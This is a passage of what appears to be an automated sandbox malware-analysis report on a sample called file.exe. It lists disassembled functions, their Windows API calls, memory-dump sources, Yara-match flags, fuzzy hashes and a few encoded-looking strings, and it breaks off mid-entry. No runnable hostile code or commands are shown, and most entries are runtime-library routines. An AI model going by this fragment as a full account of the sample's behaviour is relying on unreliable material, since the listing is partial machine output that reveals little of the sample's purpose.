                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B786EC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B7870C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                • Instruction ID: ca7c5e5a463636d8edb597a4d8a4d765bb59340f3423c9fdf4ee96ab6c69769e
                                                • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                • Instruction Fuzzy Hash: FB1192B6A016197E77213B725CCCCBF7DADDE891D870104B4F926E6100FA60EE0291B6
                                                Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                • _free.LIBCMT ref: 10006EFE
                                                • _free.LIBCMT ref: 10006F34
                                                • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                • _free.LIBCMT ref: 10007055
                                                • _free.LIBCMT ref: 1000708B
                                                • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                Function 04D0AD84 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D0ADA0
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D0ADB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Value___vcrt_
                                                • String ID:
                                                • API String ID: 1426506684-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: f7843e2fb899912db9a9cc4b2dd996d079f34fc9236902377943b3a1eb3cbf7c
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: B301B53230D3119EE73427B86CC4B5F2B54FB11279360823AE510572E1FE95A84255E8
                                                Function 0041CBE8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                                • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                                  • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                                • ___initconout.LIBCMT ref: 0041CC1B
                                                  • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                                • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                                Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                  • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                • ___initconout.LIBCMT ref: 1000CD55
                                                  • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                Function 04B7CE4F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000), ref: 04B7CE66
                                                • GetLastError.KERNEL32(?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000,00000000,?,04B7A288,?), ref: 04B7CE72
                                                  • Part of subcall function 04B7CE38: CloseHandle.KERNEL32(0042CA30,04B7CE82,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000,00000000), ref: 04B7CE48
                                                • ___initconout.LIBCMT ref: 04B7CE82
                                                  • Part of subcall function 04B7CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04B7CE29,04B7CAB3,00000000,?,04B79CE5,00000000,00000000,00000000,00000000), ref: 04B7CE0D
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000), ref: 04B7CE97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction ID: c81a9a165e413af1b1b2110292bab425c105fecd6cb466205c5ff462374140f2
                                                • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction Fuzzy Hash: 7BF0303A500118BBCF325F95DC04ACD3F36FF086A1B408474FA2996130D732E821ABD5
                                                Function 00409D0D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                                • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                                • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                                • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                • String ID:
                                                • API String ID: 3269011525-0
                                                • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                                • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                                Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 100067F1
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 10006804
                                                • _free.LIBCMT ref: 10006815
                                                • _free.LIBCMT ref: 10006826
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                Function 00409590 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                                • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                                • String ID: vector too long
                                                • API String ID: 3646673767-2873823879
                                                • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                                • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                                • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                                • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                                Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\file.exe
                                                • API String ID: 0-3695852857
                                                • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                Function 04B6BA27 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04B6BA66
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04B6BB1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 3480331319-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: f2f8526e44dca3677b544f1797a4f8c4db6d6becd238956391975d838c59c261
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 6F41B630A042289BDF10DF68C884A9EBBB5FF45318F14C1D5E8169B391DB79FA16CB91
                                                Function 0040C060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                                • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                                Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                Function 04B6C2C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlEncodePointer.NTDLL(00000000), ref: 04B6C2EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction ID: 917589a17fa48d0c0117c867cbdd4a58963f7d51df9dc502e855e3b9743bc4ae
                                                • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction Fuzzy Hash: 21412A71900149EFDF25DF98C980AEE7BB5FF48304F148499E95AA7211D239A950DB50
                                                Function 00401300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 0040138C
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: KN$]DFE
                                                • API String ID: 2296764815-873640922
                                                • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                                • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                                • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                                • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                                Function 04D00700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D0078C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: KN$]DFE
                                                • API String ID: 1385522511-873640922
                                                • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction ID: 4293d956b2bdec09bda07c90788e28a8d8ae93ca3f322661f7380e5c78bad685
                                                • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction Fuzzy Hash: E82128B0F00244DAE720EF64E8557A9B760EF59308F44C269E4541B2A1EB7461C2CF5D
                                                Function 04B61567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B615F3
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: KN$]DFE
                                                • API String ID: 4132704954-873640922
                                                • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction ID: b23fc70bfc34c276a891f5aea97341a47f012d0c7fb13a45681226f85e14eade
                                                • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction Fuzzy Hash: 05213CF0F00284CAE724EF68E8457A4B770EF1A308F84C2A5E4561B261DB7966C6CF5D
                                                Function 00408410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 0040847E
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: CD^O$_DC[
                                                • API String ID: 2296764815-3597986494
                                                • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                                • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                                • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                                • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                                Function 00407E50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407EBE
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: CD^O$_DC[
                                                • API String ID: 2296764815-3597986494
                                                • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                                • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
